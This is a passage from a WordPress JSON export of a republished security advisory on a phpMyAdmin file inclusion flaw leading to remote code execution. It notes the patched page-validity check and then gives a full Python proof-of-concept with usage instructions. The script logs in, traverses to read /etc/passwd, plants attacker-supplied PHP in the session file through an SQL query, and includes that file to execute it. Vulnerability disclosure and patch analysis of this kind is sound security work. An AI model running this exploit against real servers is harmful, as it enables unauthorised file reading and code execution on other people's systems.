class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mb_strpos<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>We can see that the function Core::checkPageValidity has another parameter, &#8220;$include&#8221;. index.php passes $include as true together with an empty whitelist (so the default self::$goto_whitelist is used); a target that is not an exact whitelist entry therefore returns false before the query-string stripping checks run, and the vulnerability is now blocked.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a094559589522\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  # -*- coding: utf-8 -*-    import re  import sys  import random  import hashlib  import logging  import argparse  import requests  from HTMLParser import HTMLParser    logger = logging  logging.basicConfig(level=logging.DEBUG, format=&#8217;%(levelname)s: %(message)s&#8217;)    URL = None  PROXIES = dict()  page = &#8216;\/index.php&#8217;      def _rand_md5():      return hashlib.md5(str(random.randint(0, 10000000000000000000))).hexdigest()      def get_token(sess, page):      resp = sess.get(URL + page)      try:          token = re.findall(              r&#8217;token&#8221;s*value=&#8221;([^&#8221;]*)&#8221;&#8216;, resp.content, flags=re.MULTILINE)[0]      except IndexError:          logger.error(&#8216;Failed to get CSRF token from server&#8217;)          return None      return HTMLParser().unescape(token)      def main(username, password, php_code, page):      session = requests.Session()      session.proxies = PROXIES      token = get_token(session, page)      session_id = _rand_md5()      response = session.post(URL + page, data={          &#8216;set_session&#8217;: session_id,          &#8216;pma_username&#8217;: username,          &#8216;pma_password&#8217;: password,          &#8216;server&#8217;: 1,          &#8216;target&#8217;: &#8216;index.php&#8217;,          &#8216;token&#8217;: token      })      updir = None      for dir_level in range(8):          updir = 
&#8216;..\/&#8217; * dir_level          response = session.get(URL + page, params={              &#8216;target&#8217;: &#8216;sql.php%3F\/..\/&#8217; + updir + &#8216;etc\/passwd&#8217;          })          if &#8216;\/sbin\/nologin&#8217; in response.content:              logger.info(&#8216;\/etc\/passwd is %d levels away&#8217;, dir_level)              break      else:          logger.error(&#8216;This version is not vulnerable, or the server is not linux&#8217;)          return 1      token = get_token(session, &#8216;\/server_sql.php&#8217;)      sql = (&#8220;select &#8216;&amp;lt;?php &#8221; + php_code + &#8221; ?&amp;gt;'&#8221;)      logger.debug(&#8216;Executing SQL query %r&#8217;, sql)      response = session.post(URL + &#8216;\/import.php&#8217;, data={          &#8216;is_js_confirmed&#8217;: 0,          &#8216;token&#8217;: token,          &#8216;pos&#8217;: 0,          &#8216;goto&#8217;: &#8216;server_sql.php&#8217;,          &#8216;message_to_show&#8217;: &#8216;Your SQL query has been executed successfully&#8217;,          &#8216;prev_sql_query&#8217;: &#8221;,          &#8216;sql_query&#8217;: sql,          &#8216;sql_delimiter&#8217;: &#8216;;&#8217;,          &#8216;show_query&#8217;: 1,          &#8216;fk_checks&#8217;: 0,          &#8216;SQL&#8217;: &#8216;Go&#8217;,          &#8216;ajax_request&#8217;: &#8216;true&#8217;      })      response = session.get(URL + &#8216;\/index.php&#8217;, params={          &#8216;target&#8217;: (&#8216;db_sql.php%3f\/..\/&#8217; + updir + &#8216;var\/lib\/php\/sessions\/sess_&#8217; + session.cookies[&#8216;phpMyAdmin&#8217;])      })      site = open(&#8216;result.html&#8217;, &#8216;w&#8217;)      site.write(response.content)      if response.status_code == 200:          logger.info(&#8216;Payload succeed. 
Result is stored inside \"result.html\" file.')\n    else:\n        logger.error(\"Couldn't run payload\")\n        return 1\n    return 0\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-u', '--user', required=True)\n    parser.add_argument('-p', '--password', required=True)\n    parser.add_argument('-U', '--url', required=True)\n    parser.add_argument('-P', '--php-payload', required=True)\n    args = parser.parse_args()\n    URL = args.url\n    sys.exit(main(args.user, args.password, args.php_payload, page))<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\"><\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n#!\/usr\/bin\/env python\n# -*- coding: utf-8 -*-\n\nimport re\nimport sys\nimport random\nimport hashlib\nimport logging\nimport argparse\nimport requests\nfrom HTMLParser import HTMLParser\n\nlogger = logging\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')\n\nURL = None\nPROXIES = dict()\npage = '\/index.php'\n\n\ndef _rand_md5():\n    return hashlib.md5(str(random.randint(0, 10000000000000000000))).hexdigest()\n\n\ndef get_token(sess, page):\n    resp = sess.get(URL + page)\n    try:\n        token = re.findall(\n            r'token\"\\s*value=\"([^\"]*)\"', resp.content, flags=re.MULTILINE)[0]\n    except IndexError:\n        logger.error('Failed to get CSRF token from server')\n        return None\n    return HTMLParser().unescape(token)\n\n\ndef main(username, password, php_code, page):\n    session = requests.Session()\n    session.proxies = PROXIES\n    token = get_token(session, page)\n    session_id = _rand_md5()\n    response = session.post(URL + page, data={\n        'set_session': session_id,\n        'pma_username': username,\n        'pma_password': password,\n        'server': 1,\n        'target': 'index.php',\n        'token': token\n    })\n    updir = None\n    for dir_level in range(8):\n        updir = '..\/' * dir_level\n        response = session.get(URL + page, params={\n            'target': 'sql.php%3F\/..\/' + updir + 'etc\/passwd'\n        })\n        if '\/sbin\/nologin' in response.content:\n            logger.info('\/etc\/passwd is %d levels away', dir_level)\n            break\n    else:\n        logger.error('This version is not vulnerable, or the server is not linux')\n        return 1\n    token = get_token(session, '\/server_sql.php')\n    sql = (\"select '&lt;?php \" + php_code + \" ?&gt;'\")\n    logger.debug('Executing SQL query %r', sql)\n    response = session.post(URL + '\/import.php', data={\n        'is_js_confirmed': 0,\n        'token': token,\n        'pos': 0,\n        'goto': 'server_sql.php',\n        'message_to_show': 'Your SQL query has been executed successfully',\n        'prev_sql_query': '',\n        'sql_query': sql,\n        'sql_delimiter': ';',\n        'show_query': 1,\n        'fk_checks': 0,\n        'SQL': 'Go',\n        'ajax_request': 'true'\n    })\n    response = session.get(URL + '\/index.php', params={\n        'target': ('db_sql.php%3f\/..\/' + updir + 'var\/lib\/php\/sessions\/sess_' + session.cookies['phpMyAdmin'])\n    })\n    site = open('result.html', 'w')\n    site.write(response.content)\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-83\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Payload succeed. Result is stored inside &#8220;result.html&#8221; file.&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">error<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Couldn&#8217;t run payload&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-90\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argparse<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ArgumentParser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-u&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;user&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-p&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;password&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-U&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;url&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_argument<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;-P&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&#8211;php-payload&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">args<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">parser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse_args<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">url<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-98\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php_payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0090 seconds] -->  <\/p>\n<p><b>How to use<\/b><br \/> python poc.py -u &lt;username&gt; -p &lt;password&gt; -U http:\/\/&lt;domain or ip&gt;\/phpmyadmin 
--php-payload=\"phpcredits();\"<\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3700\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-300x168.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 02 Jul 2018 12:19:53 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary Authenticated users can exploit a file inclusion vulnerability in phpMyAdmin which can then be combined with another vulnerability, to perform Remote Code Execution. 
In addition, authenticated attackers can view files and execute PHP files that are located on the server by exploiting a bug in the part of the code that is responsible for &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3700\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 phpMyAdmin File Inclusion and Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[14428,11682,10757],"class_list":["post-12725","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-local-file-inclusion","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12725","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12725"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12725\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12725"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12725"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org
\/{rel}","templated":true}]}}